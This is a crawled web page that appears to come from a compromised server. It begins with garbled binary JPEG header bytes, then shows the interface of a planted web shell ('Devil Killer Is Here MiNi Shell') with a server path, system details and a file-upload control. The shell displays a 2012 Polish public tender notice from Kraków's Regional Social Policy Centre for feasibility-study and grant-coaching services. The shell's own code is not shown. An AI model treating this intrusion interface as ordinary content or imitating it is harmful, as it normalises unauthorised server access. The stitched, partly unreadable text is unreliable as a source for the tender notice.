JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120220/50740-N-2012.html

<p class="kh_header"><b>Kraków: Opracowanie wzoru studium wykonalności oraz coaching z zakresu aplikowania o środki w ramach projektu Pomocna Dłoń Pod Bezpiecznym Dachem realizowanego w ramach Szwajcarsko - Polskiego Programu Współpracy</b><br>
<b>Numer ogłoszenia: 50740 - 2012; data zamieszczenia: 20.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej , ul. Piastowska 32, 30-070 Kraków, woj. małopolskie, tel. 0-12 422 06 36, faks 0-12 422 06 36 w. 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie wzoru studium wykonalności oraz coaching z zakresu aplikowania o środki w ramach projektu Pomocna Dłoń Pod Bezpiecznym Dachem realizowanego w ramach Szwajcarsko - Polskiego Programu Współpracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest opracowanie wzoru studium wykonalności (wraz z instrukcją jego wypełniania) oraz świadczenie usług coachingu z zakresu aplikowania o środki w ramach projektu |Pomocna Dłoń Pod Bezpiecznym Dachem| (opis projektu zawarty jest w pkt. 2), realizowanego w ramach Szwajcarsko - Polskiego Programu Współpracy (obszar tematyczny: Ochrona zdrowia, Cel II: Poprawa usług podstawowej opieki zdrowotnej i usług opieki społecznej na peryferyjnych i zmarginalizowanych terenach obszarów objętych koncentracją geograficzną (województwa: lubelskie, podkarpackie, świętokrzyskie, małopolskie), z preferencją dla wielosektorowego podejścia programowego), zwanego dalej SPWW.
2) Opis projektu |Pomocna dłoń pod bezpiecznym dachem|.
a) Celem projektu |Pomocna dłoń pod bezpiecznym dachem|, zwanego dalej Projektem, jest podniesienie poziomu dostępu mieszkańców Małopolski do usług opieki społecznej poprzez waloryzację bazy infrastrukturalnej domów pomocy społecznej i placówek opiekuńczo - wychowawczych, doposażenie tych jednostek w sprzęt oraz profesjonalizację usług personelu tych jednostek.
b) Grupą docelową Projektu są instytucje publiczne lub non-profit prowadzące domy pomocy społecznej (DPS) i|lub placówki opiekuńczo-wychowawcze (POW) oraz pielęgniarki|pielęgniarze, pracujący w domach pomocy społecznej.
c) Zakres wsparcia realizowanego w ramach Projektu obejmie:
- komponent I - poprawę infrastruktury domów pomocy społecznej i|lub placówek opiekuńczo-wychowawczych poprzez realizację inwestycji obejmujących przebudowę|rozbudowę|modernizację, a także finansowanie zadań związanych z zakupem niezbędnego wyposażenia, sprzętu i|lub ich renowacji;
- komponent II - podnoszenie kwalifikacji personelu domów pomocy społecznej i|lub placówek opiekuńczo-wychowawczych głównie pracującego bezpośrednio z ich mieszkańcami;
- komponent III - poprawę jakości usług pielęgniarskich dla mieszkańców domów pomocy społecznej; komponent obejmujący wspieranie kwalifikacji zawodowych pielęgniarek|pielęgniarzy pracujących w domach pomocy społecznej, wyposażenie domów pomocy społecznej w sprzęt niezbędny do świadczenia usług - stanowiący minimalne konieczne wyposażenie pielęgniarki|pielęgniarza.
d) Spośród powyższych 3 komponentów, dwa pierwsze mają być przedmiotem projektów opracowywanych i realizowanych przez małopolskie DPS i POW. Ostatni z komponentów będzie realizowany bezpośrednio przez Zamawiającego, który zorganizuje kursy i szkolenia dla pielęgniarek|pielęgniarzy oraz dokona zakupu niezbędnego wyposażenia.
d) Okres realizacji Projektu przewidziany jest na 42 miesiące, tj. w okresie styczeń 2012 - czerwiec 2015 r.
e) Minimalna kwota dofinansowania pojedynczego projektu obejmującego obligatoryjnie wydatki inwestycyjne w ramach I komponentu i nieinwestycyjne w ramach II komponentu, wynosi minimum 1 mln zł, zaś maksymalna kwota dofinansowania dla jednego projektu nie może przekroczyć 3 mln zł. Beneficjenci są zobowiązani do zapewnienia wkładu własnego na poziomie 15% wartości realizowanych przez te jednostki działań.
f) Wstępny planowany termin ogłoszenia przez Zamawiającego naboru wniosków o dofinansowanie nastąpi na przełomie I i II kwartału 2012 r. Wnioski będą przyjmowane w terminie 90 dni kalendarzowych od momentu otwarcia konkursu.
3) Studium wykonalności stanowiło będzie obligatoryjny załącznik składany do Zamawiającego w ramach aplikowania o środki z Projektu na dofinansowanie projektów inwestycyjno-szkoleniowych przez domy pomocy społecznej lub|i placówki opiekuńczo-wychowawcze działające w trybie całodobowym.
4) Wzór studium wykonalności wraz z instrukcją jego wypełniania należy opracować przy odpowiednim uwzględnieniu:
a) wymogów określonych w |Wytycznych do studium wykonalności dla projektów inwestycyjnych realizowanych w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007- 2013 (MRPO)|, przyjętych uchwałą Nr 218|11 Zarządu Województwa Małopolskiego z dnia 24 lutego 2011 r.
b) |Przewodnika do analizy kosztów i korzyści projektów inwestycyjnych| opracowanego przez Komisję Europejską (Dyrekcja Generalna ds. Polityki Regionalnej) - dokument dostępny na stronie Ministerstwa Rozwoju Regionalnego http:||www.mrr.gov.pl|aktualnosci|fundusze_europejskie_2007_2013|Strony|Polskie_tlumaczenie_przewodnika_KE_projekty_inwestycyjne.aspx.
5) Wzór studium wykonalności oraz instrukcja jego wypełniania muszą zawierać co najmniej zakres opisu logiki interwencji, zakres opisu analizy instytucjonalnej Beneficjenta, zakres opisu trwałości projektu, zakres analizy popytu|odbiorców projektu, zakres opisu analizy technicznej projektu, zakres analizy finansowej i analizy ekonomicznej, zakres opisu wpływu projektu na polityki horyzontalne. Do zakresu analizy finansowej i analizy ekonomicznej należy opracować wzory tabel wraz z instrukcją ich wypełniania.
6) Coaching z zakresu aplikowania o środki w ramach Projektu obejmować będzie następującą tematykę:
a) zasady wypełniania wniosku o dofinansowanie. Wniosek o dofinansowanie obejmuje w szczególności: opis grupy docelowej (instytucje publiczne lub non-profit prowadzące na terenie województwa małopolskiego domy pomocy społecznej i|lub placówki opiekuńczo-wychowawcze), opis wnioskodawcy, uzasadnienie potrzeby realizacji projektu, opis projektu uwzględniający m.in. cel główny i cele szczegółowe oraz planowane działania i grupę docelową, harmonogram rzeczowo-finansowy realizacji zadania wraz ze wskaźnikami produktu oraz rezultatu oraz opisem sposobu monitorowania, szczegółowy budżet z uwzględnieniem montażu finansowego oraz przewidywanymi nakładami w kolejnych latach realizacji projektu, opis przewidywanych postępowań o udzielenie zamówień publicznych (dotyczy sektora finansów publicznych). Wzór wniosku o dofinansowanie wraz z instrukcją jego wypełniania zostanie dostarczony Wykonawcy do 7 dni od podpisania umowy w sprawie realizacji niniejszego zamówienia;
b) zasady wypełniania studium wykonalności, które zostanie opracowane przez Wykonawcę;
c) wsparcie merytoryczne w zakresie skompletowania załączników do wniosku o dofinansowanie, obejmujących:
- formularz w zakresie oddziaływania projektu na środowisko (dokumenty z postępowania środowiskowego mogą być dostarczone po wyborze zadania do dofinansowania i są niezbędne do zawarcia umowy dofinansowania; w sytuacji, gdy podmiot uprawniony do ubiegania się o dofinansowanie nie posiada dokumentów z postępowania środowiskowego na etapie aplikowania o środki, przedmiot coachingu ogranicza się do wsparcia merytorycznego tego podmiotu w zakresie podjęcia przez niego działań zmierzających do wszczęcia procedury, w wyniku której skompletowane zostaną wymagane dokumenty),
- zaświadczenie organu odpowiedzialnego za monitorowanie obszarów sieci Natura 2000,
- kopia pozwolenia na budowę lub ważnego zgłoszenia robót budowlanych, a przypadku braku w|w dokumentów, oświadczenie o prawie do dysponowania nieruchomością na cele realizacji projektu; w sytuacji, gdy podmiot uprawniony do ubiegania się o dofinansowanie nie posiada pozwolenia na budowę lub ważnego zgłoszenia robót budowlanych na etapie aplikowania o środki, przedmiot coachingu ogranicza się do wsparcia merytorycznego tego podmiotu w zakresie podjęcia przez niego działań zmierzających do opracowania i złożenia programu funkcjonalno-użytkowego oraz dokumentów potwierdzających możliwość realizacji przedsięwzięcia zgodnie z planem zagospodarowania przestrzennego),
- wyciąg z dokumentacji technicznej zawierający spis tomów oraz autorów, a także krótki opis przyjętych dla zadania rozwiązań technicznych i technologicznych,
- oświadczenie o zabezpieczeniu środków na realizację projektu,
- w przypadku projektów realizowanych w partnerstwie - kopia zawartej umowy lub porozumienia określająca prawa i obowiązki partnerów,
- oświadczenie o zachowaniu celów projektu w okresie wymaganym wytycznymi SPPW liczonym od zakończenia projektu,
- odpis z Krajowego Rejestru Sądowego lub zaświadczenie o wpisie do ewidencji działalności gospodarczej dotyczący wnioskodawcy oraz ewentualnych partnerów projektu (jeśli podmiot podlega wpisowi),
- kopia statutu wnioskodawcy oraz ewentualnych partnerów projektu (nie dotyczy jednostek sektora finansów publicznych),
- oświadczenie w zakresie braku podwójnego finansowania projektów,
- oświadczenie zawierające informację, że wnioskodawca oraz ewentualni partnerzy nie są wykluczeni z możliwości aplikowania o środki na podstawie art. 207 ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (Dz. U. Nr 157, poz.1240 ze zm.),
- oświadczenie w sprawie otrzymania lub nie otrzymania pomocy publicznej w ostatnich trzech latach, w tym pomocy de minimis; w przypadku uzyskania takiej pomocy należy dodatkowo dostarczyć zaświadczenia o uzyskanej pomocy,
- oświadczenie o nie zaleganiu w podatkach stanowiących dochód budżetu państwa w rozumieniu ustawy z dnia 29 sierpnia 1997 r. Ordynacja podatkowa (tekst jednolity Dz. U. z 2005 r. Nr 8, poz.60 ze zm.); oświadczenia nie składają jednostki sektora finansów publicznych,
n) oświadczenie o nie zaleganiu w opłacaniu składek na ubezpieczenia społeczne i zdrowotne w rozumieniu ustawy z dnia 13 października 1998 r. o systemie ubezpieczeń społecznych (tekst jednolity Dz.U. z 2009 r., Nr 205, poz. 1585 ze zm.); oświadczenia nie składają jednostki sektora finansów publicznych,
- oświadczenie osoby do kontaktów w sprawie projektu dotyczące przetwarzania danych osobowych,
- w przypadku przedsiębiorców ubiegających się o dofinansowanie - pakiet niezbędnych oświadczeń oraz innych dokumentów wynikających z przepisów regulujących zasady udzielania pomocy publicznej.
7) Łączna maksymalna ilość świadczenia usług coachingowych wynosi 730 godzin, przy czym maksymalny czas świadczenia usługi dla jednego podmiotu może wynieść 5 godzin. Rozpoczęcie świadczenia usługi dla danego podmiotu następuje na podstawie zlecenia Zamawiającego. Na wniosek Wykonawcy, 5 godzinny limit może zostać zwiększony przez Zamawiającego w odniesieniu do poszczególnego podmiotu. Zmiany poszczególnego limitu nie mają wpływu na maksymalna ilość godzin świadczenia usługi.
8) Grupę docelową usług coachingowych stanowić będą instytucje publiczne lub non-profit prowadzące na terenie województwa małopolskiego domy pomocy społecznej i|lub placówki opiekuńczo-wychowawcze.
9) Zamówienie będzie realizowane na terenie województwa małopolskiego, w siedzibach (biurach) podmiotów, dla których usługa ma być świadczona lub w innym miejscu uzgodnionym pomiędzy podmiotem a Wykonawcą, w dni robocze (od poniedziałku do piątku) lub w soboty i niedziele, w przedziale czasowym od 9.00 do 19.00. Dopuszczalną formą świadczenia usługi są indywidualne konsultacje osobiste, jak również konsultacje za pośrednictwem poczty elektronicznej oraz w drodze telefonicznej. Termin konsultacji osobistych strony uzgodnią wspólnie, konsultacje telefoniczne i mailowe udzielane będą bez wcześniej uzgodnionych terminów.
10) Wykonawca zobowiązany będzie wypełniać karty świadczenia usług coachingowych wg wzoru przedstawionego przez Zamawiającego, podsumowujące każdą sesję coachingu, z wyszczególnieniem, na rzecz jakiego podmiotu był on świadczony oraz w jakim wymiarze i w jakim zakresie.
11) Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia zawarte zostały w wzorze umowy, stanowiącym część II SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 71.24.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy w tym w szczególności: w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy) w tym okresie - wykonał (a w przypadku świadczeń okresowych lub ciągłych - również wykonuje) co najmniej trzy usługi coachingu z zakresu aplikowania o środki na realizację przedsięwzięć o charakterze inwestycyjno-szkoleniowym, o łącznej wartości nie mniejszej niż 150 000 zł (przy czym wartość poszczególnej usługi nie może być mniejszej niż 25 000 zł brutto każda), oraz minimum 2 studia wykonalności w odniesieniu do inwestycji infrastrukturalnych, których przedmiotem było przebudowanie lub adaptacja lub modernizacja pomieszczeń o wartości min. 6 000,00 zł brutto każde. Ocena spełniania przez wykonawców warunków udziału w postępowaniu - o których mowa powyżej zostanie dokonana w oparciu o dokumenty wymienione w pkt III.4.1) ogłoszenia. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy, w tym w szczególności wykażą, iż w okresie realizacji usługi będą dysponować odpowiednim personelem, tj. co najmniej 3 osobami, które posiadają wyższe wykształcenie, kwalifikacje zawodowe oraz doświadczenie w postaci świadczenia usług coachingowych z zakresu aplikowania o środki na realizację przedsięwzięć o charakterze inwestycyjno-szkoleniowym, w wymiarze 250 godzin każda. Ocena spełniania przez wykonawców warunków udziału w postępowaniu - o których mowa powyżej zostanie dokonana w oparciu o dokumenty wymienione w pkt III.4.1) ogłoszenia. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy Pzp, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia-jeżeli dotyczy. 2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz Oferty według wzoru stanowiącego załącznik nr 1 do SIWZ. 3. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. W przypadku zmiany stawki podatku od towarów i usług w trakcie obowiązywania niniejszej umowy, kwota brutto określona w umowie nie ulegnie zmianie, a Strony zawrą aneks do  umowy stosownie korygujący kwotę netto oraz kwotę podatku od towarów i usług.II.1 Poza przypadkami wskazanymi w  umowie oraz w art. 144 ust. 1 ustawy Prawo zamówień publicznych, zmiana postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jest dopuszczalna na zasadach wskazanych w pkt. 2-6, jeżeli:
1) polega na zmianie osoby, o którym mowa w § 1 ust. 2 pkt 1  umowy,
2) polega na zmianie terminów, o których mowa w § 2  umowy,
3) prowadzi do obniżenia kosztów realizacji umowy lub jest w inny sposób korzystna dla Zamawiającego,
4) jest uzasadniona zmianą przepisów prawa, lub
5) wynika z innych szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
II.2. Każda ze stron przedkładając drugiej stronie propozycję zmiany, spełniającą wymogi określone w pkt. II.1, wraz z tą propozycją przedłoży:
1) opis proponowanej zmiany,
2) zakres proponowanej zmiany,
3) szacunki, czy i w jaki sposób zakładana zmiana wpłynie na termin realizacji przedmiotu umowy, oraz
4) szacunki dotyczące wpływu zmiany na wynagrodzenie należne Wykonawcy wraz z uzasadnieniem.
II.3. Po otrzymaniu propozycji, Wykonawca albo Zamawiający (w zależności od przypadku) w terminie 3 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany, bądź w tym terminie wystąpi do strony występującej z propozycją zmiany, przesyłając zmodyfikowaną propozycję zmiany, spełniającą wymogi opisane w pkt. II.2.
II.4. W przypadku upływu terminu podanego w pkt.II.3, traktuje się, iż propozycja wprowadzenia zmiany została odrzucona.
II.5. Do przesłanej zmodyfikowanej propozycji zmiany pkt. II.3-4 stosuje się odpowiednio.
II.6. Każda zmiana do umowy wymaga formy pisemnej pod rygorem nieważności.
II.7. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tychże okolicznościach.
II.8. W przypadku, o którym mowa w pkt. II.7, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu rzeczywistego wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REGIONALNY OŚRODEK POLITYKI SPOŁECZNEJ W KRAKOWIE, ul. Piastowska 32, 30-070 Kraków.</p>
